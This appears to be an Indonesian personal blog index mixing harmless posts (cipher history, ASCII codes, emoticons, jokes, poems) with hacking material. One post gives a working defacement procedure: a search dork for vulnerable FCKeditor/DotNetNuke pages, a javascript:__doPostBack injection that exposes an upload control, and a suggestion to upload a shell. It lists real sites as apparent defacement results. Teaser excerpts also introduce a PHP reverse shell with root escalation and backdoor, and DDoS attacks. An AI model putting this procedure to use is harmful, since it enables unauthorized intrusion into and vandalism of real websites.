March 2, 2010

Sejarah Enkripsi


Menoleh ke belakang dalam sejarah kita menemukan bahwa Julius Caesar adalah seorang pengguna awal kriptografi. Dia mengirim pesan ke pasukannya di sebuah metode yang sederhana namun ingeneous. Sebuah surat dalam alfabet digantikan oleh satu misalnya 5 posisi ke kanan. Jadi, seorang “A” akan digantikan oleh seorang “E“, “B” dengan “F” dan seterusnya. RETURN maka akan menjadi VJYZVS. Tapi karena ini dapat dilihat, sandi ini dapat dengan mudah rusak oleh entah mencari tahu suatu pola, dengan kekerasan atau dengan mendapatkan yang tangannya dengan plaintext dan ciphertext kombinasi untuk menyimpulkan pola

Sumber inti : http://www.mycrypto.net/encryption/why_encrypt.html

February 3, 2010

EKSPLOITASI BUFFER OVERFLOW


EKSPLOITASI BUFFER OVERFLOW

Pendahuluan

Buffer Overflow merupakan salah satu penyebab yang paling banyak menimbulkan masalah pada keamanan komputer baik yang bersifat lokal maupun jaringan. Menurut laporan CERT/CC, buffer overflow merupkan penyebab dari 50% semua bug keamanan yang dilaporkan dan dijadikan advisori oleh CERT/CC. Riset yang dilakukan oleh Crispin Cowan dan teamnya menganggap buffer overflow sebagai Vulnerbility of Decade. [Read…]

December 28, 2009

Kombinasi Tombol Keyboard Untuk Kode ASCII


Kombinasi Tombol Keyboard Untuk Kode ASCII

Kode Standar Amerika untuk Pertukaran Informasi atau ASCII (American Standard Code for Information Interchange) merupakan suatu standar internasional dalam kode huruf dan simbol seperti Hex dan Unicode tetapi ASCII lebih bersifat universal.
Kode ASCII selalu digunakan oleh komputer dan alat komunikasi lain untuk menunjukkan teks.
Kode ASCII sebenarnya memiliki komposisi bilangan biner sebanyak 8 bit.
Dimulai dari 00000000 hingga 11111111.
Total kombinasi yang dihasilkan sebanyak 256, dimulai dari kode 0 hingga 255 dalam sistem bilangan Desimal.
Contoh : Tekan dan tahan tombol ALT pada keyboard lalu tekan angka 1 pada Numpad keyboard, setelah itu lepaskan tombol ALT. Kombinasi ini akan menghasilkan karakter ☺ .
Berikut adalah kumpulan kode ascii yang dapat anda gunakan dengan cara melakukan kombinasi pada tombol keyboard anda. [Read…]

October 16, 2009

Emoticon lucu


yeahtipitendangsuper2supersombongsinchansialsenggolsenamrobotnyerahngilerngebornangismutermusikmaleslovekonsletkeselkembarjogethihihigilagemesgatauegpdamncpdcharmingbyebodobobobacokayukyess

emoticon lain : [Read…]

October 15, 2009

Yeah…. sendal jepit gw ketemu lagi, gara2 ga ketemu dari lab. hampir balik ga pake sendal a.k.a nyekermen…


cihuy…sendal jepit gw balik lagi …sebenernya ni cerita lanjutan cerita yg kemrin “colok Yu Es Be gw jd kesetrum” . begini nih cerita nye…pada jaman doeloe kala ..hehehe…bercanda deng… kemrin pas gw pulang dari lab.  beuh dah mlm cuy, harap dimaklum dunia gw terbalik siang diem mlm aktifitas gw jalan…hahaha… sambil keteuyeup kacuprak sorodot kacebur mata tuh kaya ada yg narik gitu klo dikelas

dengan Pe De gw matiin tuh compi wlw sedikit muka oon masih ada gara2 kaget kesetrum nyolokin Yu Es Be…  gw langsung pamitan ke aslab… dengan muka tenang wlw dah khusut, gw menuju ke rak spatu n sendal…Wew [dng style gw sndiri] mana eh kemana sendal gw berada. syalala…[upz.. slh mlh nyanyi] begitu gw liat dengan tampang oon gw..beuh…sendal gw ga ada cuy… yeah masa gw balik nyeker..oh tidak

sambil malu2 kucing [pdhal emang maluin], langsung gw dengan basa-basi wlw sudah basi gw tanya aja ke aslab, mas-mas baso nya berapa hehehe…oon gw sala bilang sorry mas bercanda.. n than syukur dech ada aslab yg baik hati mau minjemin sendal yg ada dilab..[denger2 sih itu punya dosen]. tp ga apa2 dech daripada gw balik nyeker… toh besoknya gw balikin, tenang wlw sebatas sendal gw balikin ko. hehehe…

akhirnya gw balik dng suasana tenang [ dlm otak gw, mana tuh sendal ya].

October 14, 2009

Colok Yu Es Be gw jd kesetrum


Beuh rabu ini gw masuk telat seperti biasanya, tadinya sih males masuk kuliah berhubung gw kemren selasa ga masuk so ni rabu gw kudu masuk wlw hujan gw brangkat… ahay pas berngkat temen gw nyarin spy pake celana pendek dulu aja spy ga basah celana satu lagi..yois gw pikir ide bagus  tuh [Read…]

October 13, 2009

Kedewasaan Berfikir


Dan kedewasaan berfikir akan terlahir dimana seseorang dalam menghadapi setiap masalah selalu bersikap tenang dan memanage setiap masalah menjadi sebuah pemicu untuk kearah yg lebih baik lagi.

October 13, 2009

Cinta Sejati Hanya Untuk Sang Illahi


Dalam gelapku tersadar akan kehadiran aura mu
Cerah wajahmu terangi kehidupan ku
Karna engkaulah terangku
Jangan pernah menyerah tuk berada disampingku

semngatku akan pudar jika kau jauh dari ku
bukan hanya fisikmu tp ketulusan hatimu

Tapi itu hanya hayalku yang tak pasti
hanya jalan buntu yang kudapati
badai kelam pun menyelimuti diri
hingga akhirya nanti ku sadari
bahwa cinta sejati hanya untuk sang Illahi.

October 13, 2009

Kupasrahkan pada-Mu


Kehidupan…

Memang kehidupan itu penuh warna
Ada suka, duka dan canda
Seiring masa yang ada
Bukan berarti hamba lupa pada Sang Esa

Satu sisi yang pasti
Dengan semua kejadian yang terjadi
Ada makna yang tersembunyi
Itulah kuasa sang Illahi Rabbi

Ya Allah, hidupku dan matiku Engkaulah yang tahu
Tak ada satupun, orang yang tahu
Di setiap sisi ku, aku selalu bermunajat pada-Mu
Hingga jalan hidupku
Kupasrahkan pada-Mu.

October 13, 2009

Atas rahmat-Mu terimalah do’aku


Luluh ku akan keagungan nama-MU
Untaian doa tak terlepas dari ucapku
Titian hidupku, ku pasrahkan pada-MU
Fitri insan tercipta atas karunia-Mu
Ikatan janji yang terpatri ditangan*-Mu
Atas rahmat-Mu terimalah do’aku

October 12, 2009

aaaa…wadow.. strum


Waktu gw kecil ya kira2 kelas 4 SD , kejadiannya dirumah. gw emang orngnya culun suka nyanyi2 ga jelas..tralala…trilili… senangnya rasa hati .. sambil makan sepotong roti ya lumayan yg wenak tenan, maklumlah biasa makan singkong rebus 😳 , ga jauh dari tempat gw bersandar gw megang satu kabel yg gw kira itu kabel ga ada arus…sambil ngunyah2 gw berjoged ria… yuhu… dan gw semakin bertingkah… tanpa gw sadar gw pencet tuh ujung kabel….dan walhasil…aaaaaaa….wadow….strum menn…[ kaya rocker menggilla pdhal emang gw kaget kestrum ] .. dan akhirnya tanpa sadar roti trakihir ketelen sama gw sambil mata melotot..dan bersyukur klo yg gw telen itu roti cb klo jengkol…oh tidak.. kesetrum

October 12, 2009

Emoticon di wordpress


Buat loe2 pada yg mau pake icon emoticon spy ga boring di waktu kita ngblog di wordpress, ni gw dapet cara pake emoticon di wordpress.

🙂 => ; – )   😕 => : – ? 😡 => : mad : 😎 => 8 – )

😀 => ; – D  😐 => : – |  😦 => : – ( 😉 => ; – )

😡 => : – x  😯 => 8 – O 😛 => : – P ❓ => : ? :

💡 => : idea : 😈 => : twisted : 😮 => : eek : ➡ => : arrow :

🙄 => : roll : :mrgreen: => : mrgrean : 😳 => : oops : ❗ => : ! :

👿 => : evil :

Untuk ngegunainnya, spasi ga di pake ex: : oops : spasinya dihilangin jadi 😳 . nah itu aja kali ya emoticon yg bisa digunain.. klo ada tambahan gw ucapin terima kasih dah berbagi.. 🙂

October 12, 2009

Dasar kecoa…gerrrr…


Kecoa ngesot, gw lompat

nangkring di jendela lompat-lompat

kecoa

dia nungging lalu buka sayap

Jalan ke arah gw sambil ngerayap

Anjriit kepala gw kepentok atap

.

hal yg gokil yg bikin gw malu, tuh kecoa anjtriit… masuk kecelana gw yg bikin gw lompat2..upz untung ga ada cewe2 yg liat .. fiuh klo ada beuh malu abiz dech gw 😳  lebih malu dari tukang tahu nyasar ke kelas yg bikin suasana kelas hening dan bergemuruh ketawa abiz…wahahaha.. 😀 tp untung tuh kecoa ga ngegigit klo ampe ngegigit..hadoh-hadoh apa kata dunia..

October 12, 2009

Tips Hindari Mata Lelah di Depan Layar Monitor


Mencegah lebih baik mengobati…tp klo dah terlanjur sakit ya diobatin lah.. hehehe 😀 disini gw mau share tips mengindari mata lelah di depan monitor…heum, kebanyakan kita ga sadar klo berlama-lama didepan monitor bisa bwt mata kita lelah ya ini bisa ngeganggu kesehatan mata… so 5 tips mengindarinya ini gw sebutin ye.. : [Read…]

October 20, 2010

Coba2 Deface aspx


Langkah-langkah :

1. Dork ->>> inurl:Fck/fcklinkgallery.aspx atau ->> inurl:”Portals/0″

maka akan muncul menu pilihan Link Type:

– URL ( A Link To An External Resource )

– Page ( A Page On Your Site )

– File ( A File On Your Site )

2. Pilih >> File ( A File On Your Site )

3. masukin javascript dibawah ini di URL,trus jalanin /enter

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

Nanti akan muncul browse utk upload file,tgl di upload aja

Untuk file yg bisa di upload antara lain :

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,

*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob

shell ? coba aja 😀

Sebagai Bahan Pembelajaran… Ini hasil ane sementara… maaf kalo jelek bgt hasilnya.. maklum newbie lagi nyoba2…hahaha…

http://www.harmonypro.co.il/portals/0/b.txt

http://www.whoa-adventures.com/Portals/0/administration/bx9.htm

__________

Original Post :

Coba2 Deface aspx, Berhasil Jga

PrOReBeLL
October 19, 2010

Reverse Connecting Shell with PHP


Rootshell adalah impian semua attacker. Biasanya seorang attacker yang masuk melalui web vulnerability, akan mengupload webshell. Dengan webshell si attacker bisa mengeksekusi command shell melalui request HTTP. Namun webshell tetaplah bukan true shell, webshell memiliki banyak keterbatasan, salah satunya adalah sifatnya yang tidak interaktif.

Dalam artikel ini saya akan menjelaskan bagaimana caranya mendapatkan true shell yang interaktif dari suatu website yang berhasil ditakeover. Dari shell tersebut saya juga memperlihatkan contoh eksploitasi lokal untuk meningkatkan privilege dari user biasa (apache) menjadi root dan mensetup sebuah backdoor sehingga si attacker kapan saja bisa mendapatkan rootshell. [Read…]

October 19, 2010

Memahami Serangan DDos


Apa itu DoS

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.

Secara umum ada 2 cara melakukan serangan DoS: [Read…]